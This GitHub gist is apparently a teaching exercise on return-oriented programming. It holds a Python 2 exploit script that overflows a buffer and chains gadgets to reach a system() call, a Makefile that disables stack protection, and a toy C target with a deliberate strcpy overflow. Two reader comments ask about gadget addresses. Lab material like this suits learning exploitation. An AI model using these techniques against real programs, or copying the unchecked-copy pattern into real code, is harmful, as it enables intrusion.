Last active
November 20, 2024 13:54
-
-
Save mayanez/c6bb9f2a26fa75261a9a26a0a637531b to your computer and use it in GitHub Desktop.
Simple ROP Exploit Example (x86)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# NOTE: For Python 2.7 | |
import os | |
import struct | |
#Find gadgets | |
pop_ret = 0x08049ca5 # start address of a pop,ret sequence | |
pop_pop_ret = 0x08049ca4 # start address of a pop,pop,ret sequence | |
lazy = 0x08049b05 # objdump -d | grep lazy | |
food = 0x08049b30 # objdump -d | grep food | |
feeling_sick = 0x08049b92 # objdump -d | grep feeling_sick | |
#Buffer Overflow | |
payload = "A"*0x6c | |
payload += "BBBB" | |
#food(0xdeadbeef) gadget | |
payload += struct.pack("I", food) | |
payload += struct.pack("I", pop_ret) | |
payload += struct.pack("I", 0xdeadbeef) | |
#feeling_sick(0xd15ea5e, 0x0badf00d) gadget | |
payload += struct.pack("I", feeling_sick) | |
payload += struct.pack("I", pop_pop_ret) | |
payload += struct.pack("I", 0xd15ea5e) | |
payload += struct.pack("I", 0x0badf00d) | |
payload += struct.pack("I", lazy) | |
os.system("./simple-rop \"%s\"" % payload) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
simple-rop: simple-rop.c | |
gcc -m32 -O0 -g -static -fno-stack-protector $^ -o $@ | |
.PHONY: clean | |
clean: | |
rm -rf simple-rop |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <string.h> | |
#include <stdlib.h> | |
char string[100]; | |
// I might need this later. ¯\_(ツ)_/¯ | |
// I'm not using it so it shouldn't affect anything. | |
void lazy() { | |
system(string); | |
} | |
void food(int magic) { | |
printf("THANK YOU!\n"); | |
if (magic == 0xdeadbeef) { | |
strcat(string, "/bin"); | |
} | |
} | |
void feeling_sick(int magic1, int magic2) { | |
printf("1m f33ling s1cK...\n"); | |
if (magic1 == 0xd15ea5e && magic2 == 0x0badf00d) { | |
strcat(string, "/echo 'This message will self destruct in 30 seconds...BOOM!'"); | |
} | |
} | |
void vuln(char *string) { | |
char buffer[100] = {0}; | |
strcpy(buffer, string); // I don't know any better. | |
} | |
int main(int argc, char** argv) { | |
string[0] = 0; | |
printf("m3 hUN6rY...cAn 1 haZ 5H3ll?! f33d mE s0m3 beef\n\n"); | |
if (argc > 1) { | |
vuln(argv[1]); | |
} else { | |
printf("y0u f0rG0T t0 f33d mE!!!\n"); | |
} | |
return 0; | |
} |
You should set pop_ret
to the address of the sequence in the program.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Should I just set pop_ret to the start of the overflow? like the first appearence of "BBBB" or after it